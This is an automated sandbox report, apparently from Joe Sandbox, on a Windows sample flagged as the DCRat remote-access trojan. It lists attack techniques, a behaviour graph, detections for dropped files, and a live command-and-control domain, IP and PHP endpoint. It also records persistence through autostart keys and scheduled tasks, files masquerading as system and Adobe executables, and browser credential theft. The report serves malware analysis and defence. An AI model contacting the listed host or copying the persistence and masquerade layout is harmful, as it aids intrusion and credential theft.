                              Obfuscated Files or Information                              		Security Account Manager331
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron21
                              Registry Run Keys / Startup Folder                              		21
                              Registry Run Keys / Startup Folder                              		1
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets251
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581086 Sample: r6cRyCpdfS.exe Startdate: 26/12/2024 Architecture: WINDOWS Score: 100 61 321723cm.renyash.ru 2->61 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Antivirus detection for URL or domain 2->69 71 18 other signatures 2->71 8 r6cRyCpdfS.exe 11 49 2->8         started        12 WmiPrvSE.exe 2->12         started        14 r6cRyCpdfS.exe 2 2->14         started        16 10 other processes 2->16 signatures3 process4 file5 45 C:\Users\user\Desktop\zujzDNjC.log, PE32 8->45 dropped 47 C:\Users\user\Desktop\wBUQRRyD.log, PE32 8->47 dropped 49 C:\Users\user\Desktop\sOCSoUjP.log, PE32 8->49 dropped 51 30 other malicious files 8->51 dropped 75 Creates an undocumented autostart registry key 8->75 77 Creates multiple autostart registry keys 8->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 8->79 87 2 other signatures 8->87 18 cmd.exe 1 8->18         started        20 csc.exe 4 8->20         started        24 schtasks.exe 8->24         started        26 17 other processes 8->26 81 Antivirus detection for dropped file 12->81 83 Multi AV Scanner detection for dropped file 12->83 85 Machine Learning detection for dropped file 12->85 signatures6 process7 file8 28 rCdgcwByUDmMcQzYkDZywyWr.exe 18->28         started        33 conhost.exe 18->33         started        35 chcp.com 1 18->35         started        37 w32tm.exe 18->37         started        43 C:\Windows\...\SecurityHealthSystray.exe, PE32 20->43 dropped 73 Infects executable files (exe, dll, sys, html) 20->73 39 conhost.exe 20->39         started        41 cvtres.exe 1 20->41         started        signatures9 process10 dnsIp11 63 321723cm.renyash.ru 37.44.238.250, 49731, 49733, 49736 HARMONYHOSTING-ASFR France 28->63 53 C:\Users\user\Desktop\yEaqNnCZ.log, PE32 28->53 dropped 55 C:\Users\user\Desktop\vCoIsDxd.log, PE32 28->55 dropped 57 C:\Users\user\Desktop\uOkAGqBf.log, PE32 28->57 dropped 59 18 other malicious files 28->59 dropped 89 Tries to harvest and steal browser information (history, passwords, etc) 28->89 file12 signatures13

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              r6cRyCpdfS.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              r6cRyCpdfS.exe100%AviraHEUR/AGEN.1323342
                              r6cRyCpdfS.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\jDownloader\smartscreen.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\DGaPaFaK.log100%AviraHEUR/AGEN.1300079
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\ROdEDIli.log100%AviraHEUR/AGEN.1362695
                              C:\Recovery\WmiPrvSE.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\GzqyMBLI.log100%AviraTR/Agent.jbwuj
                              C:\Users\user\Desktop\PLrVhZhn.log100%AviraHEUR/AGEN.1300079
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\AaEpKsEu.log100%AviraTR/AVI.Agent.updqb
                              C:\Users\user\Desktop\SChMoWhg.log100%AviraTR/AVI.Agent.updqb
                              C:\Users\user\Desktop\JVTxIHOe.log100%AviraHEUR/AGEN.1362695
                              C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat100%AviraBAT/Delbat.C
                              C:\Program Files (x86)\jDownloader\smartscreen.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\DGaPaFaK.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\ROdEDIli.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\ScMeneug.log100%Joe Sandbox ML
                              C:\Recovery\WmiPrvSE.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\PLrVhZhn.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\JVTxIHOe.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files (x86)\jDownloader\smartscreen.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\WmiPrvSE.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\AaEpKsEu.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\BVvzTrPR.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\CdKPGOIP.log21%ReversingLabs
                              C:\Users\user\Desktop\DGaPaFaK.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\FlHYcgCL.log25%ReversingLabs
                              C:\Users\user\Desktop\GzqyMBLI.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\JVTxIHOe.log17%ReversingLabs
                              C:\Users\user\Desktop\LGyNPUZX.log25%ReversingLabs
                              C:\Users\user\Desktop\LVAfadhu.log25%ReversingLabs
                              C:\Users\user\Desktop\LXFfeqSZ.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\PLrVhZhn.log25%ReversingLabs
                              C:\Users\user\Desktop\ROdEDIli.log17%ReversingLabs
                              C:\Users\user\Desktop\SChMoWhg.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\ScMeneug.log8%ReversingLabs
                              C:\Users\user\Desktop\TJxnsSJM.log21%ReversingLabs
                              C:\Users\user\Desktop\TmfudOZJ.log12%ReversingLabs
                              C:\Users\user\Desktop\UBOVNjiG.log8%ReversingLabs
                              C:\Users\user\Desktop\WudDzgUF.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\XOqvKXRc.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\XTzlBYHG.log21%ReversingLabs
                              C:\Users\user\Desktop\aEgmRURW.log8%ReversingLabs
                              C:\Users\user\Desktop\akTuGdUy.log25%ReversingLabs
                              C:\Users\user\Desktop\cVzKNqfr.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\ceWKxdyo.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\dQqVXqpO.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\dzjCIUvL.log8%ReversingLabs
                              C:\Users\user\Desktop\fkPTPiGE.log8%ReversingLabs
                              C:\Users\user\Desktop\haYbFIoh.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\jaFJWeGx.log21%ReversingLabs
                              C:\Users\user\Desktop\mESaxTkZ.log25%ReversingLabs
                              C:\Users\user\Desktop\mNqahFDV.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\mTUsIbsw.log12%ReversingLabs
                              C:\Users\user\Desktop\mVZsMoeb.log5%ReversingLabs
                              C:\Users\user\Desktop\oGFJTCoU.log17%ReversingLabs
                              C:\Users\user\Desktop\oVHaeKwr.log17%ReversingLabs
                              C:\Users\user\Desktop\rrkZaPzN.log8%ReversingLabs
                              C:\Users\user\Desktop\sOCSoUjP.log8%ReversingLabs
                              C:\Users\user\Desktop\uOkAGqBf.log5%ReversingLabs
                              C:\Users\user\Desktop\vCoIsDxd.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\wBUQRRyD.log8%ReversingLabs
                              C:\Users\user\Desktop\yEaqNnCZ.log9%ReversingLabs
                              C:\Users\user\Desktop\zujzDNjC.log9%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://321723cm.renyash.ru100%Avira URL Cloudmalware
                              http://321723cm.reP0%Avira URL Cloudsafe
                              http://321723cm.renyash.ru/100%Avira URL Cloudmalware
                              http://321723cm.renyash.ru/AuthdbBasetraffic.php100%Avira URL Cloudmalware
                              http://321723cm.rePb0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              321723cm.renyash.ru
                              		37.44.238.250
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://321723cm.renyash.ru/AuthdbBasetraffic.phptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designersGrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTherCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icorCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers?rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://321723cm.renyash.ru/rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000141EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.tiro.comrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 